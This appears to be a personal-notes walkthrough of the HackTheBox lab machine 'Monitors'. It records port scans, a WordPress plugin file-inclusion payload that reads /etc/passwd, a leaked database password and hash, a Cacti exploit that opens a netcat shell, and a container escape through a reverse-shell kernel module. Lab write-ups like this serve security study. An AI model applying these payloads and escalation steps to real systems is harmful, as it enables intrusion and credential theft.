Kzk's garden

Machine - Monitors - Hard

4 min read

Machine - Monitors - Hard

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63
$  nmap -sC -sV -p80,22  10.10.10.238 -Pn -oN  ports
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 ba:cc:cd:81:fc:91:55:f3:f6:a9:1f:4e:e8:be:e5:2e (RSA)
|   256 69:43:37:6a:18:09:f5:e7:7a:67:b8:18:11:ea:d7:65 (ECDSA)
|_  256 5d:5e:3f:67:ef:7d:76:23:15:11:4b:53:f8:41:3a:94 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=iso-8859-1).
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

$ nmap -sV --script=http-enum -p80 10.10.10.238
Exploratory

SSH doesn’t seem vulnerable HTTP 

Sorry, direct IP access is not allowed.  
  
If you are having issues accessing the site then contact the website administrator: admin@monitors.htb

add to the hosts files

we see a wordpress :) 5.5.0

Wordpress vuln?

fuzz using https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/CMS/wordpress.fuzz.txt and curl https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/CMS/wp-plugins.fuzz.txt > wp-plugins.tx

plugins nothing interesting found… themes nothing interesting found

looking to the code, I see the use of spritz

there is a remote file inclusion :)

/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd
/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://domain/exec

marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash

let’s also see the host, since I think there is multiple vhosts… (no luck)

DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=18.04
DISTRIB_CODENAME=bionic
DISTRIB_DESCRIPTION="Ubuntu 18.04.5 LTS"

define( 'DB_NAME', 'wordpress' );
 
/** MySQL database username */
define( 'DB_USER', 'wpadmin' );
 
/** MySQL database password */
define( 'DB_PASSWORD', 'BestAdministrator@2020!' );
 
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
 
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
 
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
#ServerName www.example.com
	ServerAdmin admin@monitors.htb
	ServerName cacti-admin.monitors.htb
	DocumentRoot /usr/share/cacti
	ServerAlias cacti-admin.monitors.htb
	# Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
	# error, crit, alert, emerg.
	# It is also possible to configure the loglevel for particular
	# modules, e.g.
	#LogLevel info ssl:warn
	ErrorLog /var/log/cacti-error.log
	CustomLog /var/log/cacti-access.log common
	# For most configuration files from conf-available/, which are
	# enabled or disabled at a global level, it is possible to
	# include a line for only one particular virtual host. For example the
	# following line enables the CGI configuration for this host only
	# after it has been globally disabled with "a2disconf".
	#Include conf-available/serve-cgi-bin.conf

cacti-admin.monitor.htb, we can login as admin and the password of the database..

also in searchsploit there is a vuln with an exploit that opens an nc

from www-data to …
  • ps
  1355 ?        Ssl    0:00 /usr/bin/containerd
  1373 ?        Ssl    0:00 /usr/lib/policykit-1/polkitd --no-debug
  1420 tty1     Ss+    0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
  1496 ?        Sl     0:03 /usr/sbin/mysqld --daemonize --pid-file=/run/mysqld/mysqld.pid
  1512 ?        Ss     0:00 /usr/sbin/apache2 -k start
  1586 ?        Ssl    0:01 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
  2091 ?        Sl     0:00 /usr/bin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 8443 -container-ip 172.17.0.2 -container-port 8443
  2102 ?        Sl     0:00 containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/109e2d8f43c5a10ddb0b3b823c3c1efc095a7c76b4397c73c4a14c6de917d0a4 -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
  2135 ?        Ssl    0:05 /usr/local/openjdk-8/bin/java -Dorg.gradle.appname=gradlew -classpath /usr/src/apache-ofbiz-17.12.01/gradle/wrapper/gradle-wrapper.jar org.gradle.wrapper.GradleWrapperMain --offline ofbiz
  2309 ?        Ssl    0:50 /usr/local/openjdk-8/bin/java -XX:MaxPermSize=256m -XX:+HeapDumpOnOutOfMemoryError -Xmx1024m -Dfile.encoding=UTF-8 -Duser.country -Duser.language=en -Duser.variant -cp /root/.gradle/wrapper/dists/gradle-3.2.1-bin/erlz51pt56t1o6vc7t39cikug/gradle-3.2.1/lib/gradle-launcher-3.2.1.jar org.gradle.launcher.daemon.bootstrap.GradleDaemon 3.2.1
  2361 ?        Sl     1:38 /usr/local/openjdk-8/bin/java -Xms128M -Xmx1024M -Dfile.encoding=UTF-8 -Duser.country -Duser.language=en -Duser.variant -cp /usr/src/apache-ofbiz-17.12.01/build/libs/ofbiz.jar org.apache.ofbiz.base.start.Start

we see:

  • docker on port 8443

  • java

  • Ports — 3306 >> mysql >> user of admin wp $P$Be7cx.OsLozVI5L6DD60LLZNoHW9dZ0 >> try to crackit with john >> not :’( — 8443 ?

  • in marcus folder

  • there is a .backup folder, that I cannot read

there is running an ofbiz 17.12.01 as root (maybe in the docker?) an is vulnerable! for that first … I will use chasel to have the port 8443 to my localhost

got it, I have a shell as root but I am in a container :(

capsh --print shows that I have cap_sys_module

with this privilege we can insert new kernel modules we crafted a kernel module that gives us a reverse shell.. https://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-capabilities#cap_sys_module

Linux monitors 4.15.0-151-generic #157-Ubuntu SMP Fri Jul 9 23:07:57 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

Graph View

Backlinks